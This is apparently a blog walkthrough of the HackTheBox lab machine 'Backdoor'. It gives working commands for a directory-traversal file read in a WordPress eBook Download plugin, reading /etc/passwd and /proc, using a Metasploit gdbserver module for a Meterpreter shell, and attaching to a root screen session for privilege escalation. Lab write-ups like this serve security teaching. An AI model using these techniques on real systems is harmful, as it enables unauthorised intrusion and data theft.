Backdoor from HackTheBox — Detailed Walkthrough
Showing all the tools and techniques needed to complete the box.
Machine Information
Backdoor is an easy machine on HackTheBox. We start by finding a basic WordPress site with a vulnerable plugin. This gives us an arbitrary file read via directory traversal, which we use to leak data and spy on processes. From this we find an exposed gdbserver, which accepts unauthenticated connections, and we exploit it with Metasploit to get a Meterpreter reverse shell. From there we find a detached screen session that we connect to and gain root.
Skills required are web and OS enumeration. Skills learned are finding and exploiting vulnerable software.
Initial Recon
As always let’s start with Nmap:
Three ports found initially. 1337 looks interesting as that's a little unusual; however, let's start with Apache on port 80. First add the server IP to my hosts file:
┌──(root💀kali)-[~/htb/backdoor]
└─# echo "10.10.11.125 backdoor.htb" >> /etc/hosts
WordPress
We find a basic WordPress site:
There’s no content here, let’s look for subfolders:
┌──(root💀kali)-[~/htb/backdoor]
└─# gobuster dir -u http://backdoor.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/08 22:13:41 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
/wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
/wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/12/08 22:15:21 Finished
===============================================================
From those subfolders the interesting one is wp-content; let's check that one out:
┌──(root💀kali)-[~/htb/backdoor]
└─# gobuster dir -u http://backdoor.htb/wp-content -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb/wp-content
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/08 22:16:12 Starting gobuster in directory enumeration mode
===============================================================
/plugins (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/plugins/]
/themes (Status: 301) [Size: 324] [--> http://backdoor.htb/wp-content/themes/]
/uploads (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/uploads/]
/upgrade (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/upgrade/]
===============================================================
2021/12/08 22:17:50 Finished
===============================================================
Looking in plugins we find one installed, ebook-download:
Searchsploit
Searchsploit gives us something useful:
Let’s check it out:
┌──(root💀kali)-[~/htb/backdoor]
└─# searchsploit -m php/webapps/39575.txt
Exploit: WordPress Plugin eBook Download 1.1 - Directory Traversal
URL: https://www.exploit-db.com/exploits/39575
Path: /usr/share/exploitdb/exploits/php/webapps/39575.txt
File Type: ASCII text
Copied to: /root/39575.txt
┌──(root💀kali)-[~/htb/backdoor]
└─# cat 39575.txt
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
Exploiting Plugin
So the plugin passes the ebookdownloadurl parameter straight to a file read and sends the bytes back. It is usually described as directory traversal or LFI, but nothing is included or executed: it is an arbitrary file read, and that is what we use. Let's try the example given above:
That works; let's grab passwd:
┌──(root💀kali)-[~/htb/backdoor]
└─# curl "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
<SNIP>
user:x:1000:1000:user:/home/user:/bin/bash
Spying On Processes
That also works, and root and user are the accounts we are interested in.
In the earlier nmap scan we saw port 1337 was open. With the ability to read arbitrary files we can look at /proc, where /proc/<pid>/cmdline holds the command line of every running process (the proc(5) man page covers the rest of the pseudo-filesystem). Reading it for each pid in turn tells us what is listening on that port without touching the port itself.
I used a simple loop to incrementally check /proc:
We find two interesting things. Port 1337 is running gdbserver, which is our path to getting a foothold. We can also see screen is running with a detached session; we'll come back to that later.
Meterpreter
A quick search for gdb exploits found an article describing a Metasploit method (the module is exploit/multi/gdb/gdb_server_exec). gdbserver has no authentication, so anyone who can reach the port can write memory in the debugged process and resume it. Let's try that:
With a Meterpreter session connected, start a shell and upgrade it to a pty:
meterpreter > shell
Process 2402 created.
Channel 1 created.
python3 -c "import pty;pty.spawn('/bin/bash')"
user@Backdoor:~$
User Flag
With our shell stabilised, let's grab the user flag:
user@Backdoor:~$ id
id
uid=1000(user) gid=1000(user) groups=1000(user)
user@Backdoor:~$ ls -l
-rw-r----- 1 root user 33 Dec 9 23:17 user.txt
user@Backdoor:~$ cat user.txt
<HIDDEN>
Privilege Escalation
The path to root is simple, but only if you paid attention earlier. When we scanned the processes running on the box remotely we saw this (the plugin echoes the requested path three times before the file contents, which is why /proc/814/cmdline appears three times, and the NUL separators in cmdline show up as spaces):
/proc/814/cmdline/proc/814/cmdline/proc/814/cmdline/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
This is a loop run by root that makes sure a detached screen session called root always exists: every second it checks whether root's screen socket directory is empty and, if so, starts a new detached session. So it's pretty safe to assume we just need to attach to that screen to get a root shell.
The screen man page explains the parameters. These are the ones in use, plus the one we need to attach:
-d -m Start screen in "detached" mode. This creates a new session but doesn't attach to it. This is useful for system startup scripts.
-S sessionname When creating a new session, this option can be used to specify a meaningful name for the session.
-x Attach to a not detached screen session (multi display mode); it works on a detached session as well. The session can be given as owner/name, so root/root is the session called root owned by root.
Attaching to another user's session from an unprivileged account only works because /usr/bin/screen is installed setuid root on this box (check with ls -l /usr/bin/screen); on a stock install it isn't, and this step would fail.
So this is nice and simple:
user@Backdoor:~$ /usr/bin/screen -x root/root
/usr/bin/screen -x root/root
Please set a terminal type.
Set terminal and then try again:
user@Backdoor:~$ export TERM=xterm
export TERM=xterm
user@Backdoor:~$ /usr/bin/screen -x root/root
/usr/bin/screen -x root/root
root@Backdoor:~#
Root Flag
And there we are, let’s grab that root flag:
root@Backdoor:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Backdoor:~# ls -l
-rw-r--r-- 1 root root 33 Dec 9 23:17 root.txt
root@Backdoor:~# cat root.txt
<HIDDEN>
All done. See you next time.
Twitter — https://twitter.com/pencer_io
Website — https://pencer.io
Originally published at https://pencer.io on April 26, 2022.